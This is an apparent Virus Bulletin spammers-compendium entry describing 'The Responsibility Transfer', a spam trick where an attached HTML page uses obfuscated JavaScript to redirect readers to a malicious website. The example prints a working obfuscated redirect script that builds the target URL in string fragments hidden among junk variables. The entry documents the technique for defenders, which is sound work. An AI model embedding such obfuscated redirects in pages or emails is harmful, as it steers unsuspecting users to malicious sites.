The Responsibility Transfer

UO!Responsibility!JavaScript

  31 August 2010

Description

Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. See also Script in the Middle.

Submitted by Sorin Mustaca.

Example

 <script>function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;
document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");
this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";
var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;
</script>

Entries

Cross your fingers and click

Spammers compendium entry - Cross your fingers and click

Whiter Shade of Pale

Spammers compendium entry - Whiter Shade of Pale

Slick Click Trick

Spammers compendium entry - Slick Click Trick

Now you see it; now you don't

Spammers compendium entry - Now you see it; now you don't

The Rake

Spammers compendium entry - The Rake

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.